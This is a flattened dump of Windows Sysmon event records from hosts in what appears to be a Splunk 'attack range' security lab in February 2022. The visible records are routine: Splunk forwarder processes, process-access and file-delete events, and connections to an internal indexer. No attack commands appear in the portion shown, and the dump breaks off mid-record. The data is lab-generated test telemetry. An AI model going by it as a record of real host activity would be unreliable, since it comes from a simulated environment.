11:23:19.221{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298667Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:19.221{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298666Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:19.221{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-1927-6216-5D07-000000003802}5172C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000298665Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:19.221{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1927-6216-5D07-000000003802}5172C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000298664Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:19.222{C8EA50B7-1927-6216-5D07-000000003802}5172C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000298692Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:20.687{C8EA50B7-1928-6216-5F07-000000003802}22922372C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298691Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:20.440{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1928-6216-5F07-000000003802}2292C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298690Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:20.440{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298689Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:20.440{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298688Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:20.440{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298687Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:20.440{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298686Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:20.440{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-1928-6216-5F07-000000003802}2292C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000298685Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:20.440{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1928-6216-5F07-000000003802}2292C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000298684Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:20.442{C8EA50B7-1928-6216-5F07-000000003802}2292C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000298683Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:20.425{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02B037BE8F908FE24C0F61F78CD59A39,SHA256=F7491E7C7E207E47AC7ACAE7D465E3649D4CDA87CBA8C5604871B8799DDDA576,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000298682Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:20.083{C8EA50B7-1927-6216-5E07-000000003802}68164420C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000298701Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:21.440{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4DA69D49BCC35C827A4DFAD80EF3DAF6,SHA256=36A0D800A6595E8414E7CE9D66A1F1D092D390130B628665B76714F26A2D56CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222512Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:21.102{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=265941B0DC473FBA1DEBEF648F6F2369,SHA256=26D635B472B0A7C7E3BF2D4F37393B1DF7ABD41BA2B6891AB2038A81274A0A8A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000298700Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:21.124{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1929-6216-6007-000000003802}5308C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298699Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:21.124{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298698Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:21.124{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298697Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:21.124{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298696Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:21.124{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298695Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:21.124{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-1929-6216-6007-000000003802}5308C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000298694Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:21.124{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1929-6216-6007-000000003802}5308C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000298693Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:21.125{C8EA50B7-1929-6216-6007-000000003802}5308C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000298703Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:22.441{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F3424C8F01A382B61172B98AD378C03,SHA256=DBE720777D6BD6C198FA0EB6FE964DC658013C33780BCEA175231647D319FFD2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000298702Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:19.620{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49552-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000222513Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:22.196{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9F505A343D5F1723411586F79D98EFB,SHA256=48410B43266E7CE4E8B17B354D4032A0255F98536F67DA741FCC2D9E938B8361,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222514Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:23.212{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=488E72585CB572D238B60D4ED5644A11,SHA256=F5D1539F7C13F87496A8ADD3BE04ED12F17674BB90988FAA265AAC7AEF8ECC9D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298704Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:23.455{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C92BE189C35802CFEA7DA49DE8DA4359,SHA256=7C6B5D2C03B970849D19ECD18DBEB9FB6E3572519F8FDBE078FC1DE8C755CA05,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000222516Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:21.683{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51723-false10.0.1.12-8000- 23542300x8000000000000000222515Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:24.243{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program 